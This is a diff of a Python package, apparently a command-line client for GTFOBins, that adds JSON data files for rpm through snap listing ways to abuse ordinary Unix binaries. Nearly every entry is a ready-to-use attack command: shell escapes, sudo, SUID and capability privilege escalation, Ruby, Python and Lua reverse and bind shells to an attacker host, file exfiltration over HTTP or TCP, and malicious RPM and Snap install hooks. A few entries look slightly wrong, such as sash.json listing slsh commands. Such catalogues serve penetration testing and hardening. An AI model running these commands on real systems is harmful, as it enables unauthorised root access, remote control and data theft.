gtfobins-cli 1.0.0__py3-none-any.whl

gtfo/data/rpm.json

@@ -0,0 +1,26 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "rpm --eval '%{lua:os.execute(\"/bin/sh\")}'"
+      },
+      {
+        "code": "rpm --pipe '/bin/sh 0<&1'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./rpm --eval '%{lua:os.execute(\"/bin/sh\")}'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo rpm --eval '%{lua:os.execute(\"/bin/sh\")}'"
+      },
+      {
+        "description": "It runs commands using a specially crafted RPM package. Generate it with 'https://github.com/jordansissel/fpm' and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF\n```",
+        "code": "sudo rpm -ivh x-1.0-1.noarch.rpm\n"
+      }
+    ]
+  }
+}

gtfo/data/rpmquery.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "rpmquery --eval '%{lua:posix.exec(\"/bin/sh\")}'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./rpmquery --eval '%{lua:os.execute(\"/bin/sh\")}'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo rpmquery --eval '%{lua:posix.exec(\"/bin/sh\")}'"
+      }
+    ]
+  }
+}

gtfo/data/rsync.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "rsync -e 'sh -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo rsync -e 'sh -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./rsync -e 'sh -p -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null"
+      }
+    ]
+  }
+}

gtfo/data/ruby.json

@@ -0,0 +1,52 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "ruby -e 'exec \"/bin/sh\"'"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"[host]\",\"[port]\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.",
+        "code": "ruby -run -e httpd . -p [port]\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "ruby -e 'require \"open-uri\"; IO.copy_stream(open(\"[url]\"), \"[file]\")'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "ruby -e 'File.open(\"[file]\", \"w+\") { |f| f.write(\"DATA\") }'"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "ruby -e 'puts File.read(\"[file]\")'"
+      }
+    ],
+    "library-load": [
+      {
+        "code": "ruby -e 'require \"fiddle\"; Fiddle.dlopen(\"lib.so\")'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ruby -e 'exec \"/bin/sh\"'"
+      }
+    ],
+    "capabilities": [
+      {
+        "code": "./ruby -e 'Process::Sys.setuid(0); exec \"/bin/sh\"'"
+      }
+    ]
+  }
+}

gtfo/data/run-mailcap.json

@@ -0,0 +1,28 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "run-mailcap --action=view /etc/hosts\n!/bin/sh\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "run-mailcap --action=view [file]"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "The file must exist and be not empty. This invokes the default editor, which is likely to be 'vi', other functions may apply.",
+        "code": "run-mailcap --action=edit [file]"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "sudo run-mailcap --action=view /etc/hosts\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/run-parts.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "run-parts --new-session --regex '^sh$' /bin"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo run-parts --new-session --regex '^sh$' /bin"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./run-parts --new-session --regex '^sh$' /bin --arg='-p'"
+      }
+    ]
+  }
+}

gtfo/data/rview.json

@@ -0,0 +1,100 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "rview -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      },
+      {
+        "description": "This requires that 'rview' is compiled with Lua support.",
+        "code": "rview -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "rview -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\", [port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
+      }
+    ],
+    "non-interactive-reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell. This requires that 'rview' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "rview -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\nt:connect(\"[host]\", [port]);\nwhile true do\n  local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n  local b=assert(f:read(\"*a\"));t:send(b);\nend;\nf:close();t:close();'\n"
+      }
+    ],
+    "non-interactive-bind-shell": [
+      {
+        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell. This requires that 'rview' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "rview -c ':lua local k=require(\"socket\");\nlocal s=assert(k.bind(\"*\", [port]));\nlocal c=s:accept();\nwhile true do\n  local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n  local b=assert(f:read(\"*a\"));c:send(b);\nend;c:close();f:close();'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3. Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "rview -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[host]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3. Serve files in the local folder running an HTTP server.",
+        "code": "rview -c ':py import vim,sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "Send a local file via TCP. Run `nc -l -p 12345 > \"file_to_save\"` on the attacker box to collect the file. This requires that 'rview' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "rview -c ':lua local f=io.open(\"[file]\", \"rb\")\nlocal d=f:read(\"*a\")\nio.close(f);\nlocal s=require(\"socket\");\nlocal t=assert(s.tcp());\nt:connect(\"[host]\", [port]);\nt:send(d);\nt:close();'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3. Fetch a remote file via HTTP GET request.",
+        "code": "rview -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[host]\", \"[file]\")\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file. This requires that 'rview' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "rview -c ':lua local k=require(\"socket\");\nlocal s=assert(k.bind(\"*\", [port]));\nlocal c=s:accept();\nlocal d,x=c:receive(\"*a\");\nc:close();\nlocal f=io.open(\"LFILE\", \"wb\");\nf:write(d);\nio.close(f);'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "rview [file]\niDATA\n^[\nw!\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "rview [file]"
+      }
+    ],
+    "library-load": [
+      {
+        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "rview -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'"
+      }
+    ],
+    "suid": [
+      {
+        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "./rview -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "sudo rview -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      },
+      {
+        "description": "This requires that 'rview' is compiled with Lua support.",
+        "code": "sudo rview -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ],
+    "capabilities": [
+      {
+        "description": "This requires that 'rview' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "./rview -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "description": "This requires that 'rview' is compiled with Lua support.",
+        "code": "./rview -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ]
+  }
+}

gtfo/data/rvim.json

@@ -0,0 +1,100 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "rvim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      },
+      {
+        "description": "This requires that 'rvim' is compiled with Lua support.",
+        "code": "rvim -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "rvim -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port])))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
+      }
+    ],
+    "non-interactive-reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell. This requires that 'rvim' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "rvim -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  while true do\n    local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));t:send(b);\n  end;\n  f:close();t:close();'\n"
+      }
+    ],
+    "non-interactive-bind-shell": [
+      {
+        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell. This requires that 'rvim' is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "rvim -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",[port]));\n  local c=s:accept();\n  while true do\n    local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));c:send(b);\n  end;c:close();f:close();'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3. Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "rvim -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3. Serve files in the local folder running an HTTP server.",
+        "code": "rvim -c ':py import vim,sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "Send a local file via TCP. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file. This requires that `rvim` is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "rvim -c ':lua local f=io.open(\"[file]\", 'rb')\n  local d=f:read(\"*a\")\n  io.close(f);\n  local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  t:send(d);\n  t:close();'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3. Fetch a remote file via HTTP GET request.",
+        "code": "rvim -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file. This requires that 'rvim' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "rvim -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",\"[port]\"));\n  local c=s:accept();\n  local d,x=c:receive(\"*a\");\n  c:close();\n  local f=io.open(\"[file]\", \"wb\");\n  f:write(d);\n  io.close(f);'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "rvim [file]\niDATA\n^[\nw\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "rvim [file]"
+      }
+    ],
+    "library-load": [
+      {
+        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "rvim -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'"
+      }
+    ],
+    "suid": [
+      {
+        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "./rvim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "sudo rvim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      },
+      {
+        "description": "This requires that 'rvim' is compiled with Lua support.",
+        "code": "sudo rvim -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ],
+    "capabilities": [
+      {
+        "description": "This requires that 'rvim' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "./rvim -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "description": "This requires that 'rvim' is compiled with Lua support.",
+        "code": "./rvim -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ]
+  }
+}

gtfo/data/sash.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "slsh -e 'system(\"/bin/sh\")'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo slsh -e 'system(\"/bin/sh\")'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./slsh -e 'system(\"/bin/sh\")'"
+      }
+    ]
+  }
+}

gtfo/data/scp.json

@@ -0,0 +1,31 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "TF=$(mktemp)\necho 'sh 0<&2 1>&2' > $TF\nchmod +x \"$TF\"\nscp -S $TF x y:\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file to a SSH server.",
+        "code": "scp [file] [user@host:[file]]\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file from a SSH server.",
+        "code": "scp [user@host:[file]] [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp)\necho 'sh 0<&2 1>&2' > $TF\nchmod +x \"$TF\"\nsudo scp -S $TF x y:\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "TF=$(mktemp)\necho 'sh 0<&2 1>&2' > $TF\nchmod +x \"$TF\"\n./scp -S $TF a b:\n"
+      }
+    ]
+  }
+}

gtfo/data/screen.json

@@ -0,0 +1,24 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "screen"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "This works on screen version 4.06.02. Data is appended to the file and '\\n' is converted to '\\r\\n'.",
+        "code": "screen -L -Logfile [file] echo DATA\n"
+      },
+      {
+        "description": "This works on screen version 4.05.00. Data is appended to the file and '\\n' is converted to '\\r\\n'.",
+        "code": "screen -L [file] echo DATA\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo screen"
+      }
+    ]
+  }
+}

gtfo/data/script.json

@@ -0,0 +1,20 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "script -q /dev/null"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo script -q /dev/null"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "The wrote content is corrupted by debug prints.",
+        "code": "script -q -c 'echo DATA' [file]"
+      }
+    ]
+  }
+}

gtfo/data/sed.json

@@ -0,0 +1,41 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "GNU version only. Also, this requires 'bash'.",
+        "code": "sed -n '1e exec sh 1>&0' /etc/hosts"
+      },
+      {
+        "description": "GNU version only. The resulting shell is not a proper TTY shell.",
+        "code": "sed e"
+      }
+    ],
+    "command": [
+      {
+        "description": "GNU version only.",
+        "code": "sed -n '1e id' /etc/hosts"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "sed -n \"1s/.*/DATA/w [file]\" /etc/hosts\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "sed '' [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./sed -e '' [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "GNU version only. Also, this requires `bash`.",
+        "code": "sudo sed -n '1e exec sh 1>&0' /etc/hosts"
+      }
+    ]
+  }
+}

gtfo/data/service.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "/usr/sbin/service ../../bin/sh"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo service ../../bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/setarch.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "setarch $(arch) /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./setarch $(arch) /bin/sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo setarch $(arch) /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/sftp.json

@@ -0,0 +1,26 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "sftp [user@host]\n!/bin/sh\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file to a SSH server.",
+        "code": "sftp [user@host]\nput [source_file] [destination_file]\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file from a SSH server.",
+        "code": "sftp [user@host]\nget [source_file] [destination_file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo sftp [user@host]\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/sg.json

@@ -0,0 +1,15 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "Commands can be run if the current user's group is specified, therefore no additional permissions are needed.",
+        "code": "sg $(id -ng)\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo sg root\n"
+      }
+    ]
+  }
+}

gtfo/data/shuf.json

@@ -0,0 +1,28 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "The read file content is corrupted by randomizing the order of NUL terminated strings.",
+        "code": "shuf -z \"[file]\"\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "The written file content is corrupted by adding a newline.",
+        "code": "shuf -e DATA -o \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "The written file content is corrupted by adding a newline.",
+        "code": "./shuf -e DATA -o \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "The written file content is corrupted by adding a newline.",
+        "code": "sudo shuf -e DATA -o \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/smbclient.json

@@ -0,0 +1,27 @@
+{
+  "description": "A valid SMB/CIFS server must be available.",
+  "functions": {
+    "shell": [
+      {
+        "code": "smbclient '\\\\[host]\\share'\n!/bin/sh\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Install 'https://github.com/SecureAuthCorp/impacket' and run 'sudo smbserver.py share /tmp' on the attacker box to collect the file.",
+        "code": "smbclient '\\\\[host]\\share' -c 'put [source_file] [destination_file]'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Install 'https://github.com/SecureAuthCorp/impacket' and run 'sudo smbserver.py share /tmp' on the attacker box to send the file.",
+        "code": "smbclient '\\\\[host]\\share' -c 'put [source_file] [destination_file]'\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo smbclient '\\\\[host]\\share'\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/snap.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "It runs commands using a specially crafted Snap package. Generate it with 'https://github.com/jordansissel/fpm' and upload it to the target.\n```cd $(mktemp -d)\nmkdir -p meta/hooks\nprintf '#!/bin/sh\\n%s; false' \"[command]\" >meta/hooks/install\nchmod +x meta/hooks/install\nfpm -n xxxxx -s dir -t snap -a all meta\n```",
+        "code": "sudo snap install xxxxx_1.0_all.snap --dangerous --devmode\n"
+      }
+    ]
+  }
+}